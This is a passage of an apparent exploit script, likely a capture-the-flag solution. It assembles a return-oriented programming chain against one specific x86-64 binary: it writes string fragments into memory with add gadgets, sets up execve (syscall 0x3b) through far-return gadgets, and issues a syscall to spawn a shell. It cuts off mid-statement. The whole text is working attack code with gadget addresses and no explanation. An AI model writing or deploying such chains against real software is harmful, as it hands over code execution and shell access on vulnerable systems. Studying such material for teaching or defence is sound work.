payload = p64(0x4017ca)
#0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x6e69622f)+p64(0x4c00ad)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017ca)
# 0x00000000004017ca: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret; 
payload += p64(0x68662f)+p64(0x4c00b1)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4998f7)
# 0x4998f7: pop rax ; retf
payload += p64(0x3b)+p32(0x4492c0)+p32(0x33)
# 0x4492c0: pop rdi ; retf
payload += p64(0x4c0070)+p32(0x4678ab)+p32(0x33)
# 0x4678ab: pop rsi ; retf
payload += p64(0x0)+p32(0x406b1b)+p32(0x33)
# 0x0000000000406b1b: pop rdx; ret; 
payload += p64(0x0)+p64(0x46691a)
# 0x000000000046691a: stc; syscall; 
payload +=
